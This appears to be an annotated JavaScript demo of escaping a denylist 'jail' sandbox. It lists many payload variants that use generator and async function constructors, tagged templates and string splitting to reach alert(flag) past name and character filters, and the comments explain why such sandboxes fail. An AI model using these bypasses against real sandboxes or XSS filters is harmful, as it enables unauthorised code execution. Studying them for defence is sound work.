Variations of https://medium.com/@d0nut/why-building-a-sandbox-in-pure-javascript-is-a-fools-errand-d425b77b2899 jailbreaking example
| /* | |
| Variations of https://medium.com/@d0nut/why-building-a-sandbox-in-pure-javascript-is-a-fools-errand-d425b77b2899 | |
| jailbreaking example. | |
| */ | |
// Declared with `var` in a classic script, so `flag` is also an enumerable
// property of `window`; the `for...in window` loop in jail() therefore shadows
// it as a parameter. The payloads below still read it because a function built
// through a Function-style constructor is created in the global scope, not in
// the jail's parameter scope.
var flag = "I'm the flag!";
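/**
 * Runs untrusted `code` inside a denylist "jail": every enumerable property of
 * `window`, plus `eval`, is shadowed as a parameter of a freshly built
 * Function, and a prelude nulls `Function.prototype.constructor` and `Function`
 * before the untrusted code runs.
 *
 * NOTE(review): this is a demonstration, not a security boundary. The
 * expressions that follow this function in the file reach `alert(flag)` via the
 * generator-function and async-function constructors, which are separate
 * intrinsics the prelude never touches; the linked article's point is exactly
 * that a pure-JavaScript denylist cannot be made complete. Confining untrusted
 * code needs an isolation boundary outside the language (a separate realm,
 * worker or process), not name shadowing.
 *
 * NOTE(review): `for...in` yields only enumerable properties, and the standard
 * built-ins (`Function`, `Object`, ...) are non-enumerable on the global
 * object, so they are not shadowed. `Function = null` in the prelude then
 * appears to overwrite the real global and `Function.prototype.constructor =
 * null` mutates the shared prototype — side effects that outlive the call and
 * break the host page; a second jail() call would fail at `new Function`.
 * Kept as written to preserve the demo's behaviour.
 *
 * @param {string} code - untrusted JavaScript source to execute.
 * @returns {undefined}
 * @throws {SyntaxError} if the prelude plus `code` does not parse as a function body.
 */
function jail(code) {
  // Parameter names: every enumerable global, then "eval". Each becomes an
  // `undefined` local inside the built function, hiding the global of that name.
  // `const prop` avoids the implicit global the original `for(prop in window)`
  // created.
  const shadowed = [];
  for (const prop in window) {
    shadowed.push(prop);
  }
  shadowed.push("eval");
  // The prelude runs before the untrusted code; same text the original spliced
  // into an eval'd string.
  const body = `Function.prototype.constructor = null; Function = null; ${code}`;
  // Build the function directly instead of eval'ing a source string assembled
  // from property names and an escaped copy of `code`: the resulting function
  // is the same, with no second parse step and no quoting to get wrong.
  const jail_internal = new Function(...shadowed, body);
  jail_internal.call();
}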
// NOTE(review): every payload below is the same escape in different syntactic
// forms. `.constructor` on a generator or async function literal is
// GeneratorFunction / AsyncFunction / AsyncGeneratorFunction rather than
// `Function`, so nulling `Function` in jail()'s prelude leaves them intact, and
// a function created through any of them runs in the global scope — outside
// the shadowing parameters — where `alert` and `flag` are visible. For a
// defender the lesson is that a denylist on names, tokens or characters has no
// lever on these intrinsics; such a sandbox should not be treated as a boundary.
// Presumably these lines are meant as strings handed to jail(), not as
// statements run at file top level — several consecutive lines start with `(`
// or `[` without semicolons, which would chain into one expression under ASI
// if executed as a file. TODO confirm.
// original
((function*(){}).constructor("alert(flag)"))().next()
// constructor not allowed
((function*(){})["c"+"onstructor"]("alert(flag)"))().next()
// alert not allowed
// NOTE(review): as written this line does not parse — the inner double quotes
// terminate the outer string literal; they would need escaping or single
// quotes. TODO confirm intended form.
((function*(){}).constructor("this["a"+"lert"](flag)"))().next()
// shorter
// The tagged-template forms call the same constructor and the same `.next`
// without parentheses or quote characters; this matters only to filters that
// key on those characters, and shows why character-level denylists do not hold.
(function*(){}).constructor`alert(flag)```.next``
(function*(){}.constructor)`alert(flag)```.next``
(function*(){}.constructor`alert(flag)`)``.next``
(function*(){}.constructor`alert(flag)```).next``
(function*(){}.constructor`alert(flag)```.next)``
(function*(){}.constructor`alert(flag)```.next``)
[function*(){}.constructor`alert(flag)```.next``]
// even shorter & unnamed generator function
({*''(){}})[''].constructor`alert(flag)```.next``
// even shorter & no function* keyword
({*a(){}}).a.constructor`alert(flag)```.next``
({*a(){}}.a).constructor`alert(flag)```.next``
({*a(){}}.a.constructor)`alert(flag)```.next``
({*a(){}}.a.constructor`alert(flag)`)``.next``
({*a(){}}.a.constructor`alert(flag)```).next``
({*a(){}}.a.constructor`alert(flag)```.next)``
({*a(){}}.a.constructor`alert(flag)```.next``)
[{*a(){}}.a.constructor`alert(flag)```.next``]
// using async functions
// Note: the first form assigns to an undeclared `a`, creating an implicit
// global as a side effect; async functions need no `.next`, the call itself
// runs the body.
a=async()=>{},a.constructor`alert(flag)```
(async()=>{}).constructor`alert(flag)```
// using async & generator function
// (this variant alerts 1 rather than flag)
[{async *a(){}}.a.constructor`alert(1)```.next``]